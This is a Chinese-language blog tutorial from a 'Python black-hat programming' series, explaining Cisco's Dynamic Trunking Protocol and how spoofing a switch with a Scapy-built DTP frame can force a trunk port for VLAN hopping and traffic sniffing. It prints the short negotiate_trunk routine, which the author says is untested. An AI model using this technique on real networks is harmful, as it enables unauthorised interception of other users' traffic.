Python黑帽编程 3.5 DTP攻击

Python黑帽编程 3.5 DTP攻击

在上一节,《Python黑帽编程 3.4 跨越VLAN》中,我们讨论了一般的VLAN中实施攻击的方法,这一节属于扩展内容,简单演示下Cisco特有的DTP协议的攻击方法。

由于条件限制,本节的代码我没有在实际环境下测试,不保证有效,欢迎讨论。

3.5.1 DTP协议

 

动态中继协议 DTP(Dynamic Trunking Protocol)是一种 Cisco 私有协议。DTP 用于两台交换机的直连二层端口探测对端的配置,自动协商出二层端口的链路类型和以太协议封装进而与对端自适应。这样当对端设备修改时,就不用手工修改本端配置,通过协议自适应更改即可。DTP 的重要作用是,在组网不确定的情况下,可以实现即插即用;修改网络拓扑时,也不用手工修改二层端口的配置。

 DTP 利用第二层中继帧,在两台交换机的直连端口之间进行通信。DTP 报文仅限于两个 直连端口之间的通信,维护两个直连端口的链路类型和以太封装类型。工作原理如图2所示。

2

如果交换机开启了DTP协议,攻击者假冒交换机向目标交换机发送Dynamic desirable数据包,那么会把目标端口变成Trunking端口,这意味着我们可以通过修改本机的配置进入任何一个VLAN,同时可以利用3.4节的方法进行VLAN跳跃攻击,监听所有数据了。

 

3.5.2 发送Dynamic desirable数据包

Scapyscapy.contrib.dtp包中有一个negotiate_trunk方法,原型如下:

def negotiate_trunk(iface=conf.iface, mymac=str(RandMAC())):

    print "Trying to negotiate a trunk on interface %s" % iface

    p = Dot3(src=mymac, dst="01:00:0c:cc:cc:cc")/LLC()/SNAP()/DTP(tlvlist=[DTPDomain(),DTPStatus(),DTPType(),DTPNeighbor(neighbor=mymac)])

    sendp(p)

该方法第一个参数需要我们传入发送数据包的网卡,第二个是可选参数,可以用来传入要假冒的交换机的Mac地址,如果不传入,会随机产生一个。

调用该方法,就可以完成Dynamic desirable数据包的生成和发送工作。如下代码所示:

3

数据包发送之后,会有一些延迟才会生效。

 

3.5.3 小结

本节主要讲了如何利用DTP协议攻击Cisco设备,本节的方法需要和3.4节的方法结合使用。

 

下一节,我们进入第四章《网络层攻击》。

4.0节《网络层攻击概述》已经在微信订阅号抢先发布,心急的同学进入订阅号(二维码在下方),从菜单专栏”—>”Python黑帽编程进入即可。

 

查看完整系列教程,请关注我的微信订阅号(xuanhun521,下方二维码),回复“python”。问题讨论请加qq群:Hacking 1群):303242737   Hacking 2群):147098303

 

玄魂工作室-精彩不断

 

posted @ 2016-10-13 18:42  玄魂  阅读(1660)  评论(0编辑  收藏  举报